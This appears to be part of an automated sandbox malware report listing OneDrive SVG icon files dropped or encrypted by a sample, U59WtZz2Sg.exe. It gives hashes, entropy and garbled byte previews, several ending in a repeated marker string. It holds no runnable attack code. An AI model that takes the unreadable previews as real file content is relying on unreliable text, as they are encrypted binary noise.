SHA-512:	3E7BEA4B096C69BBF5BC5BACB0B3B5273846F0AEC1D9B62250AD13C55683EB982EB1472FBD2B466AA26393F525728B3B64E2C3A0870A60A91E6123A4B30126C2
Malicious:	false
Reputation:	unknown
Preview:	<svg ...0$Sg..}<..H...-W.N...\|[.j.r..,..D..H..U....^k,.S.M.%Q &......-...UK"...q4..k8's...y..<Yk.....;...^..8...t.Vc#..S......L..Sb..Fg....Sv.Y..cy......3...T~..z^......u..WS.;1HA..2/U6.....0lAk....'.S^.P.E.R.M...hdQ.2b.....O..7.c.<.u[.Z.oR..c\....hK.fY.:.....a...OJ+....J.W...^-....U..p.J.0..N.t...G.[..<....=Z(.......y..V=.LO=.I.D.5K...Z..6..CXO....v!.w...f...?./....q..W,"...@i=o#.[_..}6.g3..A..A...gF9_...t..Ixv.ahf.H.Xj...eq'..'.~d\.......<..:..do.~o.....H,>....W...h..l..S.\..HF.v.X.l.X.\|..]....\|....a}.b.......kM....I.Z.5z].q.....wH.(.. ..G.\.';....V+.4....r$...S....w...+......ne....:Yd>%...t.....)j..1nQ.B.R.o......o..S.;....x?.O.......!E.9<.:...QU..-.~G..":........V.\|....%...f..x9...!.V2[.M.Z....T..\|...6;D...F..z....B&.....&..s.n.Lb.>....G.L.i.xP..h.<P.eZ2.:$N.&n~...x.<-...l...K,.8....:...DZfs.....w.[...#\........k....3..........0a.!..h...j(].D]s...-......M.g..\|....3.......%../....H..j...g.....~2.G...2Q.X......e...3D......U*L

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\loading.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1052
Entropy (8bit):	7.78653941837021
Encrypted:	false
SSDEEP:	24:tu246co/MiPz63fvMF/tw5HZGJt3HBhGVf4K3TJEIPk1McCs6bD:746VPW3fvotw55+tBrK3T1PtS4D
MD5:	28291A8F7CD0601244B896761B4529FC
SHA1:	CDA396B80566BFCE59F0BFC481684AAE78BA9402
SHA-256:	BC72DD76466AC623969CEA3DD659FC73F026456AD9F7A4EFB3B722C28B3F2870
SHA-512:	7EA9381F0ECFBCE64700B4A9E48B849F415A32D3C43C149730A51E873C6851D112396FEFF6CCBB2F98816FABBBF7FFBA59A0C45FC8DD3820557C6EABD137F932
Malicious:	false
Reputation:	unknown
Preview:	<svg X.?.R.W..W.k...l...~.c.N......Y(...8u3Z.&....s..)..s...m..Z...........%...t......8.C....T...Qy'.g....B..1.D.6-..S.=0..-....%f%.... ....../.T..Zf.].i?.b'...'.....9...Gv.Z.D...Xh.bT.1..............p..X.1..b.Kv)..._.m..T......Wc:....Q".w....O.z.~.../).*..I\|V./.\|.Ki...QM.f....+.._..%QcB."......d....."...B......t....RK9...a.\|,$..L.X.[$...c.%..X..>.~.,zF....)$'...L.P........_5.Pi.Z.J....C..?}...r.....&e...q....S.o.B..j....C.r".\7..AC.j..S.A...mHJR.,..5l...&..3.-.........{..hB..i=..B.1cy3q.....Yy......1........o...7.lr..C.{..9.......>.U...^...h...fo..g-.H.......bY......L..V.HR.......^....l..?.t....4.[..~j.^.........m.t..5...G..nF!y.<...p..s......H&n..63.YW...3..'..n7b..Q....+2.O}.....$}.........0......>I.....+..u.....p...8PF......H...g....j..[...4.....?.....U../n....Or..W.@..i....Ys.}........gb7..@..d.......gQ..YX.Z>..3;......C..=.^..U+.^h[....O........^.Z.E.E.!t...#5..."+w3..M..Z.E.....BZ.........\..K6te1YGPnIbo4GcGOEP3iHx1cF

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\loading_spinner.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	766
Entropy (8bit):	7.684512236495818
Encrypted:	false
SSDEEP:	12:t2ooh84wEvdGFOPE06YvJzgRGKkH6qR3Okm17CWjYNHB+V9UwSdEpTemQehtciik:tCDdG0Pn6YvjKk/UxdjiHEOwSdEpanEX
MD5:	477348C16F3B61604A49F9981C85DA9E
SHA1:	6C02473C369FE3C4A5129D1975E4D5B8866C8B80
SHA-256:	71FAC77D35DC2F80D0C4A13398DD53EB870A2B2563A985B4A7693460B9A9AB17
SHA-512:	3A645F68C4A8587AFBBF795EA09C665F9EEAD8CC152BEFA28963A857E5DF8BA31A8D972FE009C515F5A202F4001D9D639B32D0F04719CEEA9DEC32E259426C9A
Malicious:	false
Reputation:	unknown
Preview:	<svg ...<3..M.w.D...C..ZY.%.D.%.x......1&.c.k.A..g.;[..o\...i.P...F..$..wDy.zEV.C~...d...[.#..{..............Bl.b..X.l........0t....U....t...s..7iH.Q.!v...u.@d..u4.,....olI..Bi.....c.7...{.@.v...].m1r6.7..dX/..n...m........gI0=r.k2Wj..w....h....[..L(}M... 6....m./......S.+.d,..k...s.....p...B......-]...3.(V.ai.8..03.[.Y.@....W.yW....a`j.a.f........2^z.x....#.Y.%....A.....gZ..Y.'N..{;x..........9C.........m.9....~.s.t......K.)j$.g.......-.!..3V)d...o...T..ji.u.\..%!D.."/^.....$m#..d...04...[.^..3D...i.S...>k.....Si.gUn_.....Rs..p..o.f...0.....t.-N.bG.W8W...i.=....CZ.\...1._.Q....&......f.R..@.@.o..\.;e..Z..2..i.....!(3..CM...z.s6?R%.#.z.....%...K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\lock_icon.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1410
Entropy (8bit):	7.862743536062819
Encrypted:	false
SSDEEP:	24:Ks1AZbv/C4zj8NJ8n3Ppc09/ldKPZeNNTtXXZ5kePWNZ5ubvVbD:KTMqj86/pc+luOtXpcNw9D
MD5:	090C8E08E7A2FBCCECC899EDE3D99784
SHA1:	2EA6973672038384CF0A05C578CC57DDBC45BA19
SHA-256:	3E793B5C5E14B3DBDCA3DAA9158CA1A60061AA2A5C5FC0922759FC765E84FBA2
SHA-512:	475F5BA163313A5ECEB19D14C75731FB0FEB1DA2962248EF46001F429479419433073D8D7F9068E9BAEC10AAAD0258D83AD4A8EEA6D78E053150087FBB103048
Malicious:	false
Reputation:	unknown
Preview:	<?xml.g<.a.~..H.R\.7.bD.E,U.O..n....c.V.O...?.P.vH..St..m...tbp.5:..2T..3..I.a.\G..P.....Uq.U...~.N..3y.S....Q{......e...8.W........m...7..LO..b.5..}...T....,I.>.h...E.oLv.kK...p....^Zm..q8.........l.........hm.9..)...w._.??#.j.M..pQ.....P.6........o..~.z....1./m..;...(vBIS......(..L.{l[......C._Y..\.\$...f..}[h.\Q...m.........L.....;....!.".T.V@l..[@.O....p....1Q.-..1....F..J..~.............]..#....`U.`......mj.......E..Z6......z.q+$..8\....z.U.9`.mY...c.I...p..\|..t.0\|...>.Q..]VP.y.......%."i.....0Fh....k.rd.......LI.... .O..m.r...>b.L..N.&......=.z...u..#Gy.\|.K....K..E.pEq.U...Y.O..gk..'VM....k~3....aI..`....Z2..3E....s.k......O .S..E.4...e.(.q`.m.....bb.a..m,.....K.3..LF..Ct..i......Y4.N.-..5P4%e......&....&...N.P..?v.N.u..........R..WM...^.w.n..4B...qh..+...9X?=...H..O..U\|\|E..Y...T..5yO. .....F.]...u..O.Mlg)Bj./4]-\P.nT`..=....;$Bg.s...k".9......JA ..GW.5uH.g}...t.1.I.N.bK..\|*.K....d7....w.w..=yp.yo..6.4.{9...g...Xn[\|>...;...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\onDemandFiles.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	7838
Entropy (8bit):	7.973062436216674
Encrypted:	false
SSDEEP:	96:9W4CZmyEbAu713IcU5qRewT77wHXDh3aRxDRPxeKiqjM2cymyXkMp7sPg3ES2x3k:9W/Z03I15qNv7wt2DRPBc2RpQl0BIh10
MD5:	AFDF621D1D5734B1D2DBBE6AE57578A2
SHA1:	11FABC15332AEE5CEFFEC1EC51E673A943940CB0
SHA-256:	CC2F3CA12EFB8D835AA5FC1C2DCD55BDD863EA4EFEB4095BCEFF1206E2E50F1F
SHA-512:	0B01D233DDD857C1E005F1AA28CD0D9219F93386DB3DA6E4A5870DD180C40ED09DE621E2058F80686846FEA62A8655C5AB836C9B7F683DC6516AE8BC3BB06A94
Malicious:	false
Reputation:	unknown
Preview:	<svg ..#...C.h.s....0G.]S..7Y...."..X...W.`.u.Q.P...)Z........6...T...Y#......$......$..J/.......\...>..A.R_.p....pa...t...\|25...9U....(VG.?.u...#\.,...."F..inz;td....a..5.(.+Rc..8..>}.Ed>......X.R.G......u.S5?..........y.[.M..FM!.W...f.(. .+.h3H'!@...h.<Uq.)gb...<..+.. ...B."...h.6'..n..vz.. E..s.^....U.......R....&.$[X...>....i.`..C...`}......od\|..p..q.O..N+.4D.....d. B.p....^6H...m.B.p.c?...z...5+.......xk...sQ....h+..~mg..>.t.z-Xp.f..$....$..C...R.y.V..b-.....Yj.o....C.s....v.j.`.d.K.F..%..m..<....m+.L..o.f{PRI.r.^.............K..q..4.@;\.^....G....dFb.....6.5.\|.."..G]...........$!r....}..R.(Iz.>F...O..kfc7E..Q.+ ...4k.1......l.H.[....\\|......S.>.i...Q^.:.{-.3h.b-.g.<(O.f.P..)...)$,~]..s.\.-..&.!...Da&.0.Ph......jW...4...k......Y7..A..9......N.y...i..}e)p.a FQ?...../.:u.f8.m....f.). .>.D.@..T..#..]..E.^.....BZ....#Z-...W.1G...'-.KB.W.}@.>.@Z..'.K["...........t5......g...K5h..k.G.u.....".&w....%...;......j.B1U..........

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\onDemandFilesDehydrate.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	10261
Entropy (8bit):	7.981306899224551
Encrypted:	false
SSDEEP:	192:ctI8JOitX/ftgfsHMnNj5GIOZGvBXPdFpOQREBhz/HV10t:ctLJ/ftYsinOZ0BXVFpOhzXO
MD5:	86C2476F0C0B4405D13C55823188E4EE
SHA1:	DC45DB3F67788C5E3B69EB0EEA00DB0116CCEAA8
SHA-256:	7A33F4962A7EDDDA6AEE59E95CA382E16542B4A88F99C88E758B65E275CD8A99
SHA-512:	113644ABDF21352D7A8BBB45F8137A663AF169BB34CB3BFB690BD7EEE654DF8A38B016A87A67A8A987BDC726FA3AB968FC08A68A270436BFB99CEC43D8CB93CD
Malicious:	false
Reputation:	unknown
Preview:	<svg ..k..&..0..b.i.;.!.......'81^.....x..D.....k".h4.8.Au....=$B..J...'..... ?....`..t..<v.......k....v(..h....M....f[...d...6zH..Z'%X...........F........../...J..A.Q........&..).G_....$.C]J..+=u..t..X....=Y....f....%...^.. I.n..{....3\&&...r...]^.T.+a....V..(EF8.V.......8Z...x..+.. .87..r.[}....w..z..hsK....Q.o.WI\..Ny....K...w..O.8i.>.I.9.S..e...i./q....#k_]9&w+..........d.>........5Pz....u.&..?...8.%./........1..,...Y<N.5W....F.6.KU.pV..1..+.db.;...b._5)...p.s..-.&.....*.zO...w<....j1...`)."....;.l..x...O.~@..M "......).C.W........mf._7h.V..6...6.n0.....&-...z.;.<.G.t..".y.....vHv..d..M.....'xc..........^.......q-.:.[.K@1.^...(.m....V.G-..<02cE.;!;>6..upu..G?.y........}D.....%.......q.......6jz..i=.5..`..s .B3L.k...9..B....).G..g.....qC......4_.?z......\|.q....+..z....,.=..J'.I.P.@....d.....e......3.'.......2.pOU.P...../...K.E..<......eX9n.aOaA0>.'.\|.\|..\....fM.....J.e.-.Rn.N.....2+.s....U\.l,..........6....:.a..)...5.+......'...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\onDemandSelectiveSync.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	2978
Entropy (8bit):	7.939616169824686
Encrypted:	false
SSDEEP:	48:0q0SdSJ1y/O/35DF6CUfbAypO7/eirtz/jDzAn25JPMGvImPMIM3qD:sSSJjRDUzAypOre4zAn27tvFtM3i
MD5:	3EFC607AAAB5C458A4FBE55D5FE397FF
SHA1:	1B06219A279B815D82F1EE3C21E54BFD031FA4EC
SHA-256:	9A5BEC84A4A25D4015B0B958229979D6559B94EB4EF6B183B21FDAC1071143EC
SHA-512:	BF9DC43593B84C635FA7C65CA1676ED29C83B03E7DDA2840C14BF7469D36211E663D96ACF684483266D640C937005D3604E6700C567F4206D1A0C180074ED688
Malicious:	false
Reputation:	unknown
Preview:	<svg ........h.."......2..y....c0.\|.t..dIo?/}$...I........u3..I..6`A,.....\|.#.....Mv.a..... ...P.K..C...0p....C.............E...D.....f..MP..8..m..n.....\J>.t.9.A.......I.......\|...x.~F,.N.h....$....G...O....n..R.q.doH.zWh.'l..B.@....a.g4.....W..rn.e~>'[.">..T....=6...Y.M2]7.w,.<..p.:E.q..f....".....j..m.....0.R.3}./.l,.x.T..H..._...#\|.B.`Z'....M.:.,7W..fe.e.;...~.U&,.[.S:6w...O... hm.............D.SiP.3..........[.3..D.Q$.;&P.$L.....H-..........p.G...N....2.2{..s.X.2x.@..\F(4.3.....T.......Sz^.V.sl..@S%....'!NG..2ye...P.:.+lHs?D..=....?..X.z...Z.o.(<..........W..n.+K.8...J.Z.F.d.......S..)..r.W.H..]...B.R(...gq>.a..O.t...J..U...^.....$.2>.\|$j/.."@.S.<...j..S=.#.*.x...P..8.....H..C...0....}.[..e.xU;..V.......P...N-...`J..!....">..f..Ri`..Z..J........%z..F1.....vW. .i=6.@E.v.x`@12...H..2...g..u...h.r...c...W..g>Z0.@.3..0.\.+gHr.zA.e.O..H....F...:.@...;/V......BCX...s....7...;\|tD.x../.......`..:K./....+V..nE..._!..{..H.F...k..g2...$..hK

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\overflowIcon.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1321
Entropy (8bit):	7.830366107536162
Encrypted:	false
SSDEEP:	24:tclnKkVN0uT6uHEOPQKoIBlJpR8XLKbWJ1HaNGLkWffklsl1n2w+FUsbD:cFVNiZqhoIBlJpR8GbW/aNGL9ffklsvu
MD5:	FE50FBD11992D5FF5C5EE7A03C89BE8B
SHA1:	E9B6BCB1253884EE4B6940057951DBB3157AD9C9
SHA-256:	A1313DEA1789F97F21C091B740C756B1EB7FB8C494883372FEBA155F8BE4B56B
SHA-512:	83FA02014A41F95B2BF5D6204182E7328EB68D95E5C99E7C74DD9F94E8DEF6933F04C142335D6B348EA7D5DB95633DF9AE9B149AFD5EF06F20A8851C09C598CD
Malicious:	false
Reputation:	unknown
Preview:	<svg ...c..F.........\..V..wZ....3.>.vS...:...t.>k.[.....%'}.E.f....e.X.....`..._......6..ZyfH915oQ.o.,....yl..(.l8iZ;.+......A..P...3I..9..K....."..&............(.%X..Pf...Iu..w$.aF.2......!..A_vfo;.l\_9=....U).[.'.n....(..E!-"..9....4.7T.{Q..7WIQ..'.0..J...t.o\..IVBt..w....(......{Mb.!.)....]..@.sN.NyX.RE.....S..Ys.m..7M...r.kV.R1_.p...........t..H.C...&P.1.. .X.N.s.g....ir.....X./R..l..'1....l6./y. .."R.z.... \.s]...B..$...O.._&..o.,3{zS.A<.U.X...d./u=..c/...j-..(H...[.<..=.1.#......?.&uNl..D.t..M(.LE...A.@..B.Uk.V.O.......7.+{.....S^.m.y.;...r5../,.....8nEm..'G..(...\Z.......5.MH.[.M..F..3.....o>...sod.r.8.+...5...W.\5o2..Cr....a...C.G..l.%X.*.y>P_..X.........k..B......7..1Q..H..8..A.rTx...14.2.(C'.&.I...gk...<.....!.>.(...'n...A..,.G....g..17.a....X....7...?6y. O.[..#n.?..5D.\\|..fFE..2..k.{<..M.1,z....$...^.-.xs..h..#y1.....Z;..0.......Yq.B...?E.. ...9..8.A..}...c.n+.r.4.....O..{RP.%%B..D.p..?..N..........{.).,..K&]Iz..p.....

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\overflowIconLarge.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1455
Entropy (8bit):	7.865564456454951
Encrypted:	false
SSDEEP:	24:tWyjyJEo/RkVi6lM1Jau5wGqNahAevHzaLNT+xX7HRN3w89GhK8dhnhrpMaDTphU:bmN/RkV3gqoh7KCNxN3wMGhK8dhnhyGu
MD5:	357EEEFAFD9ADC683399F08CAFC9D80C
SHA1:	19A3DE5F7ADEADB97AB61F6DE562D6D4E68F7035
SHA-256:	F406BABA2E480B74CBCDBD03B775DA27D4CF949A2CB83C96ED640FE1167F4688
SHA-512:	5A87BD50E22C008C1C6FFE17555CBB2AC4E72F8F8062ADE6E6119998E261268A5BD1C8E5BF53EB19EBF0E929B18C7DB2B0D60F914568CC9EA64EEBBEF40EC164
Malicious:	false
Reputation:	unknown
Preview:	<svg .H..~mP...-...Kd.K`.ep....G..3...>I.I....MPa:i.+.46H.\|lv..w.&h(,X..8....fw2.3,.Q.z<E..E#...e..........50O.T....S.Ly.E..6..f...xc.n.-.1.. jU:.....z.:^d......MPa....\z.<h..X....uu<..u......i.TG.....<.f.yZe.Ty..7..~[\$...B44..{....1.9.......}.C7fW.Q...R...KO3.....w2!....m..dTN.l.x..-Ww......Y.A...y...Ue.v..}6..=>.......U.!...Tv...h!..F..Z.Z.....1.....(.UaK.X........n.B_r.....o....vt..j.#.....Hz]..@....{.."(..0....p..............Q...d.'.+.+...../..I.]g.,.UZ..i...N......$..5 .7...:....$.9;.....#.}...... r..6X..C...O..6V.......S..g.N...G.eR.KF.Z...p..h{.H....j.'[E..gT..uz.osq&@..&..d....H%.e9..K..HD..z..r..m..D._wAC\|%?.../2]........r7..+.k7^8.Tzy..+{......9....3..6).S..?Zk.rM.P.........c....U.....4.).&H...]_..U.7...,...X(q'f.Mq.\.;.(V..+.'..d..g...pF..jj.IT..P...E...P...&.......G.9^........Ic.V..:1.7...q;..o.#\Pta/..=c/.O...3.[0./l.s.af-s..P.nq...C..{..W.B...chQ..b...w.$..... l`......0e..0....U.p.UT..kko.[..?,3..".....Ou..].K......qr=J....p ...,

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\partiallyFreezing.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	4741
Entropy (8bit):	7.95780338337298
Encrypted:	false
SSDEEP:	96:Spx1ux92K1asC8wjEYU9AE5fvcYyv/xNxiR7N8VVVLMgj:myeK4sCdk9jBc/XxNwR7N8DV9
MD5:	4A7A502DB2FFF529B68D1279A2F982EA
SHA1:	B18D69BCB966EE7D25E443D0FAB6D7A8B5E76977
SHA-256:	CFF5DF2C5A9E8B1EA675FA333B40FB2CDBD90728656E6BF739775F64912CC64B
SHA-512:	46CB77502F5463C255CC0E40984C859F23EE69C34949847E573E3ED65540AD2EEC5D2A199415AD60855A81C47FA3BAF65CD3E9A504CF6791EA417F0AFE9DCA3A
Malicious:	false
Reputation:	unknown
Preview:	<svg I.N.q;l..z....%.-..J...(....g\..'Z.{...X.....h.KH/'o....RX...>a..ys.......9..\|....TeX......(.>..Cg.."....5s$...\.....z......{.j..F.....w}Uk?..\|(PV...j./.:!.4.c.j).[.F.... ..ue....L...>....~..._Z...v.........F...;..8..L.t.6.........j.D.g%..P...D+..-u....hH...im.......o..,-_...OC.l...7...n..%.b.}...S...I.k.......X.-.j..q...Bd..)..XM.A..3;....#@h.mT.s..Q[.?..U...h..2..&TG2.X...j...a..1`.r..N.,....'......g\......=.................].....nP.m..<.A..9fg...&....../>{.'.b[...Py?BG.. ..n....i! ..$.U..^.1.;ee...W0.i.S.Fw..f.8...f.]}..4i.6z7...}?.;.tR..i\C...,T>W..k.T.]D>..nC.>...:.)O....EUw.$.1)....".Q{..ni.]I...D.v.#:..-...fQ!...$[E...a.."..7..B.Va.....\|.w."@vv.nWO...1.T'...CD.X\...L.z.....$.... .'....7C........{#.#8.'t...cg.m2$_._&...u...v....R..=s.7..P.F....S..8..].fY........{...E."K...Y..7.>.b.y.y.0....?;Y.k.O.s.q.......r....U.SmD6....."9.lL....=.&d........$........rSpb....~.b.;..L.4.f..C...~5..*...(.Rgj.A.p...~D...o.yr$s....

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\paused.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	644
Entropy (8bit):	7.667855516475594
Encrypted:	false
SSDEEP:	12:tsV7sU1Lxfjkf6Rn6d71etlQid8dh//yZkiQ+/WyiE9u1YJ9uKGvPtcii9a:tCrVQf6B0ReUo8d1/ymireFEE18rObD
MD5:	03F3B8A5182A31C01AD47BBC5B6CB472
SHA1:	4F2E215C1216E63EEBEE372C87510B4F17D73C9C
SHA-256:	D12CE6EE034D103E92889CF666BAFB9EA18393DD235F05056FFD297892FECFC7
SHA-512:	596F0860F188A6A25EBF1F5BB70BBE54996437F50A95D8EC96D30A0C3833252EC65231CF199B4ECE4D5545A5A8DAE68666FC4CD4C5D72288742B5019DCB4327C
Malicious:	false
Reputation:	unknown
Preview:	<svg ..s..aJ..S.}@c.z....M.#...;...q.......`.}3w....^.....A.{..p.......0.. U...+.%...7T.i..0..l.,...^.....%...Y.,.<%..QL7?...~ko..:\..G..e?.\..VY.Xy.F%n...F.;sG..Y.X-q.tN.R.r....L.}BF..?#..$...(L...........'[...9.....'X...t....}./.~J.;.<.Y?8.4cf?.........k.~.$r.......m..;]p. JF. ....O__....9...b.).s\|kZ.t.T..%{..K=.v..j.2Wd.3G...e..(....!....#,.8...r.y.eY..]v....Q..I...[+..R%..5#%]l...5S".{.. .?A.."<. .C.8..B...B..72.8@..[.!.K\.T.....n@.R.-..m.Cz..9.e..`.....h..b. .."..`X..x...........!_.8..z"......V.5.A.Ae..\|9..'(vZ.........3K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\pc_alert.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	758
Entropy (8bit):	7.699871718084705
Encrypted:	false
SSDEEP:	12:wfKaqiWYhYkGtcagXnv1oBvHf4/KUd8O0yhDYBTmkIWYD99xdG7U+Ola4Ytcii9a:wfK01GtcrWBn4/Kq/hES99KUD84ubD
MD5:	6F36FB411835255D21A956941602AD3C
SHA1:	36363B6B977E07505DC6B1F8C521B83D426C89C5
SHA-256:	121EEA636E3B9E820B811989B8847323096216D36C32B5702E319BF22D6534C0
SHA-512:	E0C7AB1E33C4DAF7876C4A854D897EBF658BF22FE0EE21D481B4CD8623E2BEBB3E71E8767762EDC8D165B5FB89EF91E0CABD65993CE770AE8F82F89A9857F1D2
Malicious:	false
Reputation:	unknown
Preview:	<?xmlBJ.G^..+Cw.-..%..\....).X6...{.`O.k...Y.:.4.....\|..Z..X0...?...,......(8g.1n.g.7.....Z$.gY...xP..a..b...JR.Fo.:}B].[...b...3/.?.N.ki...-..8...)G~.......tI....E.....cD....P.%P...L.&q........k..g.N.@....<w#..x96P.#iM.z...~..#o.^s.u....}........e.......8.@n..A....... ......o^[7.h..1.XsQ3.....a.>..:=_R.....P.?.^.Z../O....!Bx..V2........gK...(..\|...g..x{.....L..6.H.O...`._.....g..=<n.`P..gh2a.$.."p......F6...w.KG...~..x.w...3.4...`=..T.....K.I......T..G...Z(U,0&[.P...$.fW.....<(m.B.q.^.yf..n.(..^...Js9....9j,^...u.t.S..b...J{.l........pj......Qw->..4?.~..e.......k...q....j....c..K....M.u..z.n+.....{..$.h;"...^.z%C+._..Z.e.BWOt.a..K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\premiumIcon.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	711
Entropy (8bit):	7.695879425773315
Encrypted:	false
SSDEEP:	12:tcPcBDy7SuW3o5O8q/dLLhIvmeA4LLf7BFe4GRWJkns1OI3oqIJRqVStcii9a:tEIDiSupO8q/JdI+MXXe4uWqsv3oq80+
MD5:	11CF6FC7BFBA81512BE2141D93C9700A
SHA1:	ACA032E48FF2DADC3A98DF0EDB6F27916415922E
SHA-256:	510A5A722CA2096627B37E011F931241FEFDD8242131869E400F4921365A8DB1
SHA-512:	9C93691DFF0E7A98CD559666DD191FC3914B5B0242342148FC4044E626A40BDE3A231CA4A93F61C85290676CF00783C23CF4C921C8044CFAEB6DD596FD489852
Malicious:	false
Reputation:	unknown
Preview:	<svg ........wu...@.........l.....1.....%p....'....nk......._.'_...j.\.5.].<V&..mN.........._M.^U..DV .6.......=......W.uAdv...'0.#....M$..h...$.#.yW.f=l..{......k....i3.'<......GG0...b......\|t.......VBK..gfi.s.?..8....h.>{.2...f+... Y..m}A/..{.T.\|....T.e@U..w.@/O..eM.:..+.J...EC.E..3x....a....V*..LG...@J.Z..5t.-..iI.G....!.g...G.6&........x;..@...]^y+XL.U..sA..ka.V._..t8.(.T.jx....%;1.....R..b..a(0..o...i..V...~..B.}7.;..8..T..L_..8..z...v..g..b....:.lm.V..E....0yX..h....A..0..S...c.5.L...$Op=1......T?......1.....)....N.....x.W....4=..2y'.P...........N..S!....A..}1...\|\|.... ..t..m....{;.H2...6N../.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\reSignIn.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	11234
Entropy (8bit):	7.979552153685182
Encrypted:	false
SSDEEP:	192:PtevEzANh8Eso31tb3SuJ9f3RGAUJj5nUGndAl2JHKWsqkicVXs8QeRteTRt9:PtFENhVnbiuj3YA0j5HdzJqWsqkzZfR0
MD5:	62D589761C8EA49BCB32BC2D2C9B94CA
SHA1:	58876BD6BAE754B1371D8148B50C056E12D24D62
SHA-256:	970532424941C47C5F4560A49E82569DC6DFE435B681EBAC50066336953A72F8
SHA-512:	040316B5843BE8EE1562E46BC4A593D495065FDAD23199CD7A46141FE62AE1F11729EE72D523E5B6C8577EC5ED383D894DA4C230C7BDBABFC5DA9BF9A81024C8
Malicious:	false
Reputation:	unknown
Preview:	<svg .c.;....5..ZK=..n.u.M........C.@.r.\|.%.X.SB.(.5..{4.3L...N...k/.[.'..<.tgX#....Y..}b.".....".B.(..t.v...}.......w......F..#.......X....A...Q'...o..p..+..3...\|l.......v.9.....h. .W..$.#8..(3..n..2.U.B..f.,a..B.$..V..L...=..............q.+.nu....S;.`......y.G...jK.M.?.<.w., ;g...E4...z\|........CMs..7....C..X...[B.{..Z.!..p"...f.....p....I.N....Vd~.(...~..<..SI?.M.+....J.Tu.(\p.?cG.4....S......j...{.z...F.5J..8F...E..2..+.-.\.".\|..kc...eo."3Z.\u....C.#........R......s....ym.).jg.fg.l...'.jG(Vh../Z.Xf^.kF...m.....&a.[..q.......N..9.....n...@\|.h....w...V..SAB....Tdzv...-. o.'..t<JW.$...D.x..40\|i..'...\|....qB..Q...m.....M...qN........K..H.]..\|.W...E.U.}!8!Ao...../......5H."%..R\|.ll..{8.`'.6.Z.D.O.......r..... .L..r....#s....i..;:~$D..-..F...uHE.....j!3..{ro.Q.VI./H...g....#V~J .<z.pB.....i.3..~..v/Bl...}V......)d.H#.e..U..v.zl.b..Q.....J..E.1.....mS.....iE`..l.9...k.....M...).W.n.=.Q.>,.vD...0..a4....\|.....=...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\recycleBin.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	3780
Entropy (8bit):	7.946082329166493
Encrypted:	false
SSDEEP:	96:ClPFD8yjTWUDHXz5RVpy2WbSWbyriwJ1dl2N:Clph+UnnVlWbSWbvwTO
MD5:	3713BC12B858BC43D27C1E4AC8032BAB
SHA1:	4ADCC9DB6A948CD3E68CA3440F4464B5FDA86F71
SHA-256:	D37C2FCABDB8321BFDF1EEA8FA5457CBEE5A6E1E4ADD0F78B5577BEE130DCF34
SHA-512:	C16C906E24EDA518714EA7AE7719415C1246DA8FA86662088EF5F62DD29FF292AC544ABB92B0711E3140EB2C70B35B8572F98AA08D7DE254CE9306276FE46FF2
Malicious:	false
Reputation:	unknown
